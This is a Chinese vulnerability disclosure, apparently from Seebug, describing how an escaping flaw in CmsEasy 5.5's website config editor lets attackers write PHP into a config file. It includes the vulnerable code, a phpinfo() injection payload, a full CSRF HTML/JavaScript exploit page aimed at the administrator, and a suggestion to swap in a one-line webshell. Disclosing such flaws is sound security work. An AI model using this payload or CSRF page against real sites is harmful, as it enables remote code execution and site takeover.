cmseasy 后台csrf缓存配置文件可导致getshell(2)

### 简要描述： cmseasy 管理员身份 后台缓存配置文件，没有过滤一个字符导致getshell(2) ### 详细说明： 直接到: [<img src="https://images.seebug.org/upload/201409/1015371863c172f309cfab357de41a81ee417eca.png" alt="28.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/1015371863c172f309cfab357de41a81ee417eca.png) 然后我们分析代码： website_admin.php:(lines:25-43): ``` function editwebsite_action() { chkpw('website_edit'); if (front::post('submit')) { $var = front::$post; $path = ROOT.'/config/website/'.front::$post['path'].'.php'; $contenttmp = file_get_contents(ROOT.'/config/config.example.php'); if (is_array($var)) foreach ($var as $key=>$value) { $value=str_replace("'","\'",$value); $contenttmp=preg_replace("%(\'$key\'=>)\'.*?\'(,\s*//)%i","$1'$value'$2",$contenttmp); } @file_put_contents($path,$contenttmp); //echo '<script type="text/javascript">alert("操作完成！")</script>'; front::refresh(url('website/listwebsite',true)); } $path = ROOT.'/config/website/'.front::$get['id'].'.php'; $datatmp = include $path; $this->view->data = $datatmp; } ``` 我们找到这两句： ``` $value=str_replace("'","\'",$value); $contenttmp=preg_replace("%(\'$key\'=>)\'.*?\'(,\s*//)%i","$1'$value'$2",$contenttmp); ``` 跟我上一个属于同一个毛病，转来转去的最终还是把\' 转化成为\\' 我们访问url: url：http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818/uploads/index.php?case=website&act=editwebsite&table=&admin_dir=admin&site=default postdata: name=%E5%85%AC%E5%8F%B8%E7%BD%91%E7%AB\'%2bphpinfo(),//&path=test&site_url=http%3A%2F%2Fwww.cmseasy.cn%2F&site_username=admin&site_password=admin&site_admindir=admin&submit=%E6%8F%90%E4%BA%A4 然后这个文件就会在config\website生成一个test.php，我们访问一下看看: [<img src="https://images.seebug.org/upload/201409/1016081173a85aa1557bf9cb97be12c365d1e9d6.png" alt="29.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/1016081173a85aa1557bf9cb97be12c365d1e9d6.png) 下来我们构造csrf文件: ``` <html> <body> <script> function csrf_sql(){ var xhr = new XMLHttpRequest(); xhr.open("POST", "http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818/uploads/index.php?case=website&act=editwebsite&table=&admin_dir=admin&site=default", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.withCredentials = "true"; var body='name=%E5%85%AC%E5%8F%B8%E7%BD%91%E7%AB\'%2bphpinfo(),//&path=test&site_url=http%3A%2F%2Fwww.cmseasy.cn%2F&site_username=admin&site_password=admin&site_admindir=admin&submit=%E6%8F%90%E4%BA%A4'; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } csrf_sql(); </script> </body> </html> ``` 我们放到另一台机器上去，然后发给管理员，管理员触发之后，看看这里是否生成了我们想要的shell: [<img src="https://images.seebug.org/upload/201409/10161009f3c96b8652eb6a0ad6c95384e5d2e9bb.png" alt="30.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/10161009f3c96b8652eb6a0ad6c95384e5d2e9bb.png) 这个我们一看就不用担心，因为这是个配置文件，站点肯定会全局include的，当它include的时候这个phpinfo就会执行了，我们在此访问一下站点： [<img src="https://images.seebug.org/upload/201409/101616379b6463662511dbd2a32fee82c3789849.png" alt="31.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/101616379b6463662511dbd2a32fee82c3789849.png) [<img src="https://images.seebug.org/upload/201409/1016164631f58cee4535cf022064bbaea44d2606.png" alt="32.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/1016164631f58cee4535cf022064bbaea44d2606.png) ok演示完毕，这里我们可以替换phpinfo 自己生成一个一句话木马即可 ### 漏洞证明：